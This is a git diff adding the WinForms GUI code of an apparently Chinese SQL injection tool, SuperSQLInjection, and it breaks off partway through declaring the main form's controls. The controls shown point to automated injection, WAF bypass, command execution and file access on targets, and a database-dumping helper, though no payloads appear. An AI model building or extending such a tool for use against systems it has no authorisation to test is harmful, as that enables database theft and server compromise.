diff --git a/SuperSQLInjection.sln b/SuperSQLInjection.sln
new file mode 100644
index 0000000..5278121
--- /dev/null
+++ b/SuperSQLInjection.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 11.00
+# Visual Studio 2010
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SuperSQLInjection", "SuperSQLInjection\SuperSQLInjection.csproj", "{6C2AE3DB-3349-4A1F-9287-9278629CD0D6}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x86 = Debug|x86
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Debug|x86.ActiveCfg = Debug|x86
+ {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Debug|x86.Build.0 = Debug|x86
+ {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Release|x86.ActiveCfg = Release|x86
+ {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Release|x86.Build.0 = Release|x86
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/SuperSQLInjection/ADDNOD~1.RES b/SuperSQLInjection/ADDNOD~1.RES
new file mode 100644
index 0000000..7080a7d
--- /dev/null
+++ b/SuperSQLInjection/ADDNOD~1.RES
@@ -0,0 +1,120 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 2.0
+
+
+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/About.Designer.cs b/SuperSQLInjection/About.Designer.cs
new file mode 100644
index 0000000..65af73d
--- /dev/null
+++ b/SuperSQLInjection/About.Designer.cs
@@ -0,0 +1,65 @@
+namespace SuperSQLInjection
+{
+ partial class About
+ {
+ ///
+ /// Required designer variable.
+ ///
+ private System.ComponentModel.IContainer components = null;
+
+ ///
+ /// Clean up any resources being used.
+ ///
+ /// true if managed resources should be disposed; otherwise, false.
+ protected override void Dispose(bool disposing)
+ {
+ if (disposing && (components != null))
+ {
+ components.Dispose();
+ }
+ base.Dispose(disposing);
+ }
+
+ #region Windows Form Designer generated code
+
+ ///
+ /// Required method for Designer support - do not modify
+ /// the contents of this method with the code editor.
+ ///
+ private void InitializeComponent()
+ {
+ System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(About));
+ this.richTextBox1 = new System.Windows.Forms.RichTextBox();
+ this.SuspendLayout();
+ //
+ // richTextBox1
+ //
+ this.richTextBox1.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.richTextBox1.Location = new System.Drawing.Point(0, 0);
+ this.richTextBox1.Name = "richTextBox1";
+ this.richTextBox1.Size = new System.Drawing.Size(595, 304);
+ this.richTextBox1.TabIndex = 2;
+ this.richTextBox1.Text = resources.GetString("richTextBox1.Text");
+ //
+ // About
+ //
+ this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
+ this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
+ this.ClientSize = new System.Drawing.Size(595, 304);
+ this.Controls.Add(this.richTextBox1);
+ this.Name = "About";
+ this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
+ this.Text = "关 于";
+ this.ResumeLayout(false);
+
+ }
+
+ #endregion
+
+ private System.Windows.Forms.RichTextBox richTextBox1;
+
+
+
+
+ }
+}
\ No newline at end of file
diff --git a/SuperSQLInjection/About.cs b/SuperSQLInjection/About.cs
new file mode 100644
index 0000000..297427a
--- /dev/null
+++ b/SuperSQLInjection/About.cs
@@ -0,0 +1,18 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Text;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection
+{
+ public partial class About : Form
+ {
+ public About()
+ {
+ InitializeComponent();
+ }
+ }
+}
diff --git a/SuperSQLInjection/AddNode.Designer.cs b/SuperSQLInjection/AddNode.Designer.cs
new file mode 100644
index 0000000..73665af
--- /dev/null
+++ b/SuperSQLInjection/AddNode.Designer.cs
@@ -0,0 +1,72 @@
+namespace SuperSQLInjection
+{
+ partial class AddNode
+ {
+ ///
+ /// Required designer variable.
+ ///
+ private System.ComponentModel.IContainer components = null;
+
+ ///
+ /// Clean up any resources being used.
+ ///
+ /// true if managed resources should be disposed; otherwise, false.
+ protected override void Dispose(bool disposing)
+ {
+ if (disposing && (components != null))
+ {
+ components.Dispose();
+ }
+ base.Dispose(disposing);
+ }
+
+ #region Windows Form Designer generated code
+
+ ///
+ /// Required method for Designer support - do not modify
+ /// the contents of this method with the code editor.
+ ///
+ private void InitializeComponent()
+ {
+ this.btn_addNode = new System.Windows.Forms.Button();
+ this.txt_node_text = new System.Windows.Forms.TextBox();
+ this.SuspendLayout();
+ //
+ // btn_addNode
+ //
+ this.btn_addNode.Location = new System.Drawing.Point(192, 21);
+ this.btn_addNode.Name = "btn_addNode";
+ this.btn_addNode.Size = new System.Drawing.Size(56, 23);
+ this.btn_addNode.TabIndex = 0;
+ this.btn_addNode.Text = "添 加";
+ this.btn_addNode.UseVisualStyleBackColor = true;
+ this.btn_addNode.Click += new System.EventHandler(this.btn_addNode_Click);
+ //
+ // txt_node_text
+ //
+ this.txt_node_text.Location = new System.Drawing.Point(21, 21);
+ this.txt_node_text.Name = "txt_node_text";
+ this.txt_node_text.Size = new System.Drawing.Size(152, 21);
+ this.txt_node_text.TabIndex = 1;
+ //
+ // AddNode
+ //
+ this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
+ this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
+ this.ClientSize = new System.Drawing.Size(266, 64);
+ this.Controls.Add(this.txt_node_text);
+ this.Controls.Add(this.btn_addNode);
+ this.Name = "AddNode";
+ this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
+ this.Text = "AddNode";
+ this.ResumeLayout(false);
+ this.PerformLayout();
+
+ }
+
+ #endregion
+
+ private System.Windows.Forms.Button btn_addNode;
+ private System.Windows.Forms.TextBox txt_node_text;
+ }
+}
\ No newline at end of file
diff --git a/SuperSQLInjection/AddNode.cs b/SuperSQLInjection/AddNode.cs
new file mode 100644
index 0000000..c537476
--- /dev/null
+++ b/SuperSQLInjection/AddNode.cs
@@ -0,0 +1,75 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Text;
+using System.Windows.Forms;
+using tools;
+
+namespace SuperSQLInjection
+{
+ public partial class AddNode : Form
+ {
+ public AddNode()
+ {
+ InitializeComponent();
+ }
+
+ public TreeNode tn = null;
+ public TreeView tvw = null;
+ public int type = 0;
+
+ private void btn_addNode_Click(object sender, EventArgs e)
+ {
+ if (this.txt_node_text.TextLength <= 0)
+ {
+ MessageBox.Show("请输入节点的值!");
+ return;
+ }
+ TreeNode ctn = new TreeNode(this.txt_node_text.Text);
+ if (type == 1)
+ {
+ ctn.Tag = "dbs";
+
+ if (Tools.isExistsNode(tvw.Nodes,this.txt_node_text.Text))
+ {
+ MessageBox.Show("已存在相同的节点!");
+ }
+ else {
+ tvw.Nodes.Add(ctn);
+ }
+ }
+
+ else {
+
+ if (tn != null)
+ {
+ if ("dbs".Equals(tn.Tag))
+ {
+ ctn.Tag = "table";
+ }
+ else if ("table".Equals(tn.Tag))
+ {
+ ctn.Tag = "column";
+ }
+ if (Tools.isExistsNode(tn.Nodes, this.txt_node_text.Text))
+ {
+ MessageBox.Show("已存在相同的节点!");
+ }
+ else
+ {
+ tn.Nodes.Add(ctn);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("请选择添加表或列对应的数据库或表!");
+ }
+ }
+
+
+ }
+ }
+}
diff --git a/SuperSQLInjection/AddNode.resx b/SuperSQLInjection/AddNode.resx
new file mode 100644
index 0000000..7080a7d
--- /dev/null
+++ b/SuperSQLInjection/AddNode.resx
@@ -0,0 +1,120 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 2.0
+
+
+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/FindString.Designer.cs b/SuperSQLInjection/FindString.Designer.cs
new file mode 100644
index 0000000..2533825
--- /dev/null
+++ b/SuperSQLInjection/FindString.Designer.cs
@@ -0,0 +1,109 @@
+namespace SuperSQLInjection
+{
+ partial class FindString
+ {
+ ///
+ /// Required designer variable.
+ ///
+ private System.ComponentModel.IContainer components = null;
+
+ ///
+ /// Clean up any resources being used.
+ ///
+ /// true if managed resources should be disposed; otherwise, false.
+ protected override void Dispose(bool disposing)
+ {
+ if (disposing && (components != null))
+ {
+ components.Dispose();
+ }
+ base.Dispose(disposing);
+ }
+
+ #region Windows Form Designer generated code
+
+ ///
+ /// Required method for Designer support - do not modify
+ /// the contents of this method with the code editor.
+ ///
+ private void InitializeComponent()
+ {
+ this.label1 = new System.Windows.Forms.Label();
+ this.find_txt = new System.Windows.Forms.TextBox();
+ this.button1 = new System.Windows.Forms.Button();
+ this.label2 = new System.Windows.Forms.Label();
+ this.lbl_count = new System.Windows.Forms.Label();
+ this.SuspendLayout();
+ //
+ // label1
+ //
+ this.label1.AutoSize = true;
+ this.label1.Location = new System.Drawing.Point(12, 21);
+ this.label1.Name = "label1";
+ this.label1.Size = new System.Drawing.Size(53, 12);
+ this.label1.TabIndex = 0;
+ this.label1.Text = "关键字:";
+ //
+ // find_txt
+ //
+ this.find_txt.Location = new System.Drawing.Point(71, 18);
+ this.find_txt.Name = "find_txt";
+ this.find_txt.Size = new System.Drawing.Size(164, 21);
+ this.find_txt.TabIndex = 1;
+ this.find_txt.TextChanged += new System.EventHandler(this.find_txt_TextChanged);
+ //
+ // button1
+ //
+ this.button1.Location = new System.Drawing.Point(341, 17);
+ this.button1.Name = "button1";
+ this.button1.Size = new System.Drawing.Size(75, 23);
+ this.button1.TabIndex = 2;
+ this.button1.Text = "查找下一个";
+ this.button1.UseVisualStyleBackColor = true;
+ this.button1.Click += new System.EventHandler(this.button1_Click);
+ //
+ // label2
+ //
+ this.label2.AutoSize = true;
+ this.label2.Location = new System.Drawing.Point(241, 22);
+ this.label2.Name = "label2";
+ this.label2.Size = new System.Drawing.Size(53, 12);
+ this.label2.TabIndex = 3;
+ this.label2.Text = "匹配数:";
+ //
+ // lbl_count
+ //
+ this.lbl_count.AutoSize = true;
+ this.lbl_count.Location = new System.Drawing.Point(300, 22);
+ this.lbl_count.Name = "lbl_count";
+ this.lbl_count.Size = new System.Drawing.Size(11, 12);
+ this.lbl_count.TabIndex = 3;
+ this.lbl_count.Text = "0";
+ //
+ // FindString
+ //
+ this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
+ this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
+ this.ClientSize = new System.Drawing.Size(429, 57);
+ this.Controls.Add(this.lbl_count);
+ this.Controls.Add(this.label2);
+ this.Controls.Add(this.button1);
+ this.Controls.Add(this.find_txt);
+ this.Controls.Add(this.label1);
+ this.Name = "FindString";
+ this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
+ this.Text = "查找";
+ this.ResumeLayout(false);
+ this.PerformLayout();
+
+ }
+
+ #endregion
+
+ private System.Windows.Forms.Label label1;
+ private System.Windows.Forms.TextBox find_txt;
+ private System.Windows.Forms.Button button1;
+ private System.Windows.Forms.Label label2;
+ private System.Windows.Forms.Label lbl_count;
+ }
+}
\ No newline at end of file
diff --git a/SuperSQLInjection/FindString.cs b/SuperSQLInjection/FindString.cs
new file mode 100644
index 0000000..e2d7ed7
--- /dev/null
+++ b/SuperSQLInjection/FindString.cs
@@ -0,0 +1,68 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Text;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection
+{
+ public partial class FindString : Form
+ {
+
+ public FindString()
+ {
+ InitializeComponent();
+ }
+ public int searchPoint = 0;
+ public TextBox txtbox = null;
+ private void button1_Click(object sender, EventArgs e)
+ {
+ //查找下一个
+
+ if (txtbox.Text == "")
+ {
+ //没内容
+ MessageBox.Show("查找内容为空,请输入查找内容", "", MessageBoxButtons.OK, MessageBoxIcon.Error);
+ }
+ else
+ {
+ //有查找内容时
+ searchPoint = txtbox.Text.IndexOf(this.find_txt.Text, searchPoint);//用IndexOf索引
+ if (searchPoint <0)
+ {
+ //没找到
+ MessageBox.Show("已到文本末尾,没有找到", "提示", MessageBoxButtons.OK, MessageBoxIcon.Information);
+ searchPoint = 0;
+ }
+ else
+ {
+ //找到了,选中文本
+ txtbox.Select(searchPoint, this.find_txt.Text.Length);
+ searchPoint = searchPoint + this.find_txt.Text.Length;
+ txtbox.Focus();
+ }
+ }
+ }
+
+ private void find_txt_TextChanged(object sender, EventArgs e)
+ {
+
+ int count = 0; //计数器
+ string search = this.find_txt.Text; //要查的字符串
+ if("".Equals(search)){
+ return;
+ }
+
+ for (int i = 0; i <= txtbox.Text.Length - search.Length; i++)
+ {
+ if (txtbox.Text.Substring(i, search.Length).ToLower() == search.ToLower())
+ {
+ count++;
+ }
+ }
+ this.lbl_count.Text = count.ToString();
+ }
+ }
+}
diff --git a/SuperSQLInjection/FindString.resx b/SuperSQLInjection/FindString.resx
new file mode 100644
index 0000000..7080a7d
--- /dev/null
+++ b/SuperSQLInjection/FindString.resx
@@ -0,0 +1,120 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 2.0
+
+
+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/Main.Designer.cs b/SuperSQLInjection/Main.Designer.cs
new file mode 100644
index 0000000..0bf1ced
--- /dev/null
+++ b/SuperSQLInjection/Main.Designer.cs
@@ -0,0 +1,3176 @@
+namespace SuperSQLInjection
+{
+ partial class Main
+ {
+ ///
+ /// 必需的设计器变量。
+ ///
+ private System.ComponentModel.IContainer components = null;
+
+ ///
+ /// 清理所有正在使用的资源。
+ ///
+ /// 如果应释放托管资源,为 true;否则为 false。
+ protected override void Dispose(bool disposing)
+ {
+ if (disposing && (components != null))
+ {
+ components.Dispose();
+ }
+ base.Dispose(disposing);
+ }
+
+ #region Windows 窗体设计器生成的代码
+
+ ///
+ /// 设计器支持所需的方法 - 不要
+ /// 使用代码编辑器修改此方法的内容。
+ ///
+ private void InitializeComponent()
+ {
+ this.components = new System.ComponentModel.Container();
+ System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Main));
+ this.gb_basic = new System.Windows.Forms.GroupBox();
+ this.chk_useSSL = new System.Windows.Forms.CheckBox();
+ this.btn_exportConfig = new System.Windows.Forms.Button();
+ this.cbox_basic_threadSize = new System.Windows.Forms.ComboBox();
+ this.cbox_basic_reTryCount = new System.Windows.Forms.ComboBox();
+ this.cbox_basic_encoding = new System.Windows.Forms.ComboBox();
+ this.cbox_basic_timeOut = new System.Windows.Forms.ComboBox();
+ this.label9 = new System.Windows.Forms.Label();
+ this.label11 = new System.Windows.Forms.Label();
+ this.label5 = new System.Windows.Forms.Label();
+ this.btn_autoInject = new System.Windows.Forms.Button();
+ this.cbox_basic_dbType = new System.Windows.Forms.ComboBox();
+ this.label6 = new System.Windows.Forms.Label();
+ this.cbox_basic_injectType = new System.Windows.Forms.ComboBox();
+ this.txt_basic_port = new System.Windows.Forms.TextBox();
+ this.label2 = new System.Windows.Forms.Label();
+ this.txt_basic_host = new System.Windows.Forms.TextBox();
+ this.label3 = new System.Windows.Forms.Label();
+ this.label7 = new System.Windows.Forms.Label();
+ this.label1 = new System.Windows.Forms.Label();
+ this.menuStrip_main = new System.Windows.Forms.MenuStrip();
+ this.tsmi_menu = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_openConfig = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_saveConfig = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_tools = new System.Windows.Forms.ToolStripMenuItem();
+ this.脱裤助手ToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_seting = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_help = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_readme = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_about = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_update = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_mustRead = new System.Windows.Forms.ToolStripMenuItem();
+ this.版本ToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_bugReport = new System.Windows.Forms.ToolStripMenuItem();
+ this.gb_logo = new System.Windows.Forms.GroupBox();
+ this.txt_log = new System.Windows.Forms.TextBox();
+ this.tab_logCenter = new System.Windows.Forms.TabPage();
+ this.splitContainer1 = new System.Windows.Forms.SplitContainer();
+ this.groupBox5 = new System.Windows.Forms.GroupBox();
+ this.log_lvw_httpLog = new System.Windows.Forms.ListView();
+ this.log_col_index = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.log_col_payload = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.col_runtime = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.log_col_code = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.log_col_bodyLength = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.log_col_sleepTime = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.log_cms_dataifo = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.data_cms_clearLog = new System.Windows.Forms.ToolStripMenuItem();
+ this.groupBox6 = new System.Windows.Forms.GroupBox();
+ this.tabControl2 = new System.Windows.Forms.TabControl();
+ this.tabPage3 = new System.Windows.Forms.TabPage();
+ this.log_txt_request = new System.Windows.Forms.TextBox();
+ this.tabPage4 = new System.Windows.Forms.TabPage();
+ this.log_txt_response = new System.Windows.Forms.TextBox();
+ this.tabPage1 = new System.Windows.Forms.TabPage();
+ this.webBro_log = new System.Windows.Forms.WebBrowser();
+ this.tab_file = new System.Windows.Forms.TabPage();
+ this.file_txt_result = new System.Windows.Forms.TextBox();
+ this.groupBox7 = new System.Windows.Forms.GroupBox();
+ this.file_btn_start = new System.Windows.Forms.Button();
+ this.file_cbox_readWrite = new System.Windows.Forms.ComboBox();
+ this.file_txt_filePath = new System.Windows.Forms.TextBox();
+ this.label14 = new System.Windows.Forms.Label();
+ this.cbox_file_readFileEncoding = new System.Windows.Forms.ComboBox();
+ this.label24 = new System.Windows.Forms.Label();
+ this.tab_dataCenter = new System.Windows.Forms.TabPage();
+ this.tabC_dataCenter = new System.Windows.Forms.TabControl();
+ this.tab_vers = new System.Windows.Forms.TabPage();
+ this.data_lvw_ver = new System.Windows.Forms.ListView();
+ this.data_lvw_ver_verName = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.data_lvw_ver_verValue = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.data_cms_vers = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.data_cms_tsmi_getVariable = new System.Windows.Forms.ToolStripMenuItem();
+ this.data_cms_tsmi_stopGetVariable = new System.Windows.Forms.ToolStripMenuItem();
+ this.data_cms_tsmi_copyVerValue = new System.Windows.Forms.ToolStripMenuItem();
+ this.tab_dbs = new System.Windows.Forms.TabPage();
+ this.spc_dbs = new System.Windows.Forms.SplitContainer();
+ this.data_dbs_ts = new System.Windows.Forms.ToolStrip();
+ this.data_dbs_tsl_getDBS = new System.Windows.Forms.ToolStripButton();
+ this.data_dbs_tsl_getTables = new System.Windows.Forms.ToolStripButton();
+ this.data_dbs_tsl_getColumns = new System.Windows.Forms.ToolStripButton();
+ this.groupBox2 = new System.Windows.Forms.GroupBox();
+ this.data_tvw_dbs = new System.Windows.Forms.TreeView();
+ this.data_cms_dbs = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.data_dbs_tsmi_addDBS = new System.Windows.Forms.ToolStripMenuItem();
+ this.data_dbs_tsmi_addTableOrColumn = new System.Windows.Forms.ToolStripMenuItem();
+ this.data_dbs_tsmi_getTableNames = new System.Windows.Forms.ToolStripMenuItem();
+ this.data_dbs_tsmi_deleteNode = new System.Windows.Forms.ToolStripMenuItem();
+ this.data_dbs_tsmi_stopGetInfos = new System.Windows.Forms.ToolStripMenuItem();
+ this.data_dbs_tsmi_saveDTCStruct = new System.Windows.Forms.ToolStripMenuItem();
+ this.data_dbs_tsmi_loadDTCStruct = new System.Windows.Forms.ToolStripMenuItem();
+ this.data_dbs_tsmi_clearDTCStruct = new System.Windows.Forms.ToolStripMenuItem();
+ this.imglist_database = new System.Windows.Forms.ImageList(this.components);
+ this.toolStrip1 = new System.Windows.Forms.ToolStrip();
+ this.toolStripLabel3 = new System.Windows.Forms.ToolStripLabel();
+ this.data_dbs_txt_start = new System.Windows.Forms.ToolStripTextBox();
+ this.toolStripLabel1 = new System.Windows.Forms.ToolStripLabel();
+ this.data_dbs_txt_count = new System.Windows.Forms.ToolStripTextBox();
+ this.data_dbs_tsl_getDatas = new System.Windows.Forms.ToolStripButton();
+ this.data_dbs_tsl_exportDatas = new System.Windows.Forms.ToolStripButton();
+ this.toolStripLabel2 = new System.Windows.Forms.ToolStripLabel();
+ this.data_dbs_cob_db_encoding = new System.Windows.Forms.ToolStripComboBox();
+ this.groupBox4 = new System.Windows.Forms.GroupBox();
+ this.data_dbs_lvw_data = new System.Windows.Forms.ListView();
+ this.cms_data_dbs_lvw_data = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.data_dbs_lvw_tsmi_copyLineData = new System.Windows.Forms.ToolStripMenuItem();
+ this.data_dbs_lvw_tsmi_stop = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_clearColumns = new System.Windows.Forms.ToolStripMenuItem();
+ this.myicon_list = new System.Windows.Forms.ImageList(this.components);
+ this.tab_injectCenter = new System.Windows.Forms.TabPage();
+ this.groupBox1 = new System.Windows.Forms.GroupBox();
+ this.txt_inject_request = new System.Windows.Forms.TextBox();
+ this.cms_dataPacks = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.tsmi_createGetTemplate = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_createPOSTTemplate = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_changeRequestMethod = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_createPackByURL = new System.Windows.Forms.ToolStripMenuItem();
+ this.groupBox3 = new System.Windows.Forms.GroupBox();
+ this.groupBox16 = new System.Windows.Forms.GroupBox();
+ this.label4 = new System.Windows.Forms.Label();
+ this.txt_inject_showColumn = new System.Windows.Forms.TextBox();
+ this.label8 = new System.Windows.Forms.Label();
+ this.txt_inject_unionColumnsCount = new System.Windows.Forms.TextBox();
+ this.groupBox15 = new System.Windows.Forms.GroupBox();
+ this.cbox_inject_type = new System.Windows.Forms.ComboBox();
+ this.label27 = new System.Windows.Forms.Label();
+ this.inject_btn_autoFindKey = new System.Windows.Forms.Button();
+ this.injectConfig_btn_checkKey = new System.Windows.Forms.Button();
+ this.txt_inject_key = new System.Windows.Forms.TextBox();
+ this.chk_inject_reverseKey = new System.Windows.Forms.CheckBox();
+ this.chk_openURLEncoding = new System.Windows.Forms.CheckBox();
+ this.btn_inject_setEncodingRange = new System.Windows.Forms.Button();
+ this.label13 = new System.Windows.Forms.Label();
+ this.label12 = new System.Windows.Forms.Label();
+ this.btn_inject_clearRequest = new System.Windows.Forms.Button();
+ this.btn_inject_sendData = new System.Windows.Forms.Button();
+ this.chk_inject_foward_302 = new System.Windows.Forms.CheckBox();
+ this.btn_inject_setInject = new System.Windows.Forms.Button();
+ this.mytab = new System.Windows.Forms.TabControl();
+ this.tab_cmd = new System.Windows.Forms.TabPage();
+ this.cmd_txt_result = new System.Windows.Forms.TextBox();
+ this.groupBox8 = new System.Windows.Forms.GroupBox();
+ this.cmd_chk_showCmdResult = new System.Windows.Forms.CheckBox();
+ this.cmd_btn_start = new System.Windows.Forms.Button();
+ this.cmd_txt_cmd = new System.Windows.Forms.TextBox();
+ this.label15 = new System.Windows.Forms.Label();
+ this.tab_bypass = new System.Windows.Forms.TabPage();
+ this.groupBox9 = new System.Windows.Forms.GroupBox();
+ this.cbox_base64Count = new System.Windows.Forms.ComboBox();
+ this.bypass_btn_saveTemplate = new System.Windows.Forms.Button();
+ this.bypass_cbox_loadTemplate = new System.Windows.Forms.ComboBox();
+ this.label28 = new System.Windows.Forms.Label();
+ this.chk_reaplaceBeforURLEncode = new System.Windows.Forms.CheckBox();
+ this.cob_keyRepalce = new System.Windows.Forms.ComboBox();
+ this.label10 = new System.Windows.Forms.Label();
+ this.bypass_chk_base64 = new System.Windows.Forms.CheckBox();
+ this.bypass_cbox_randIPToHeader = new System.Windows.Forms.ComboBox();
+ this.label18 = new System.Windows.Forms.Label();
+ this.label17 = new System.Windows.Forms.Label();
+ this.bypass_cbox_sendHTTPSleepTime = new System.Windows.Forms.ComboBox();
+ this.bypass_chk_inculdeStr = new System.Windows.Forms.CheckBox();
+ this.label16 = new System.Windows.Forms.Label();
+ this.bypass_txt_replaceTo = new System.Windows.Forms.TextBox();
+ this.bypass_txt_replace = new System.Windows.Forms.TextBox();
+ this.bypass_lvw_replaceString = new System.Windows.Forms.ListView();
+ this.col_replace = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.col_replaceTo = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.bypass_lvw_replaceString_cms = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.bypass_delselect = new System.Windows.Forms.ToolStripMenuItem();
+ this.bypass_btn_addReplaceStr = new System.Windows.Forms.Button();
+ this.label19 = new System.Windows.Forms.Label();
+ this.tab_encoding = new System.Windows.Forms.TabPage();
+ this.groupBox13 = new System.Windows.Forms.GroupBox();
+ this.label21 = new System.Windows.Forms.Label();
+ this.label23 = new System.Windows.Forms.Label();
+ this.encode_cbox_encode = new System.Windows.Forms.ComboBox();
+ this.encode_cbox_decode = new System.Windows.Forms.ComboBox();
+ this.groupBox11 = new System.Windows.Forms.GroupBox();
+ this.encode_txt_result = new System.Windows.Forms.TextBox();
+ this.groupBox10 = new System.Windows.Forms.GroupBox();
+ this.encode_txt_input = new System.Windows.Forms.TextBox();
+ this.tab_scanInjection = new System.Windows.Forms.TabPage();
+ this.groupBox14 = new System.Windows.Forms.GroupBox();
+ this.splitContainer2 = new System.Windows.Forms.SplitContainer();
+ this.scanInject_lsb_links = new System.Windows.Forms.ListBox();
+ this.scanInjectionURL_cms = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.tsmi_exportScanInjectionURL = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_clearScanInjectionURL = new System.Windows.Forms.ToolStripMenuItem();
+ this.scanInjection_lvw_result = new System.Windows.Forms.ListView();
+ this.col_index = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.col_url = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.col_testURL = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.col_param = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.col_injectionType = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.col_injectionDB = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.col_mark = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.scanInjection_cms = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.scanInjection_cms_exportResult = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_tsmi_exortTestURL = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_tsmi_exortOldURL = new System.Windows.Forms.ToolStripMenuItem();
+ this.scanInjection_cms_copyURL = new System.Windows.Forms.ToolStripMenuItem();
+ this.scanInjection_cms_clearResult = new System.Windows.Forms.ToolStripMenuItem();
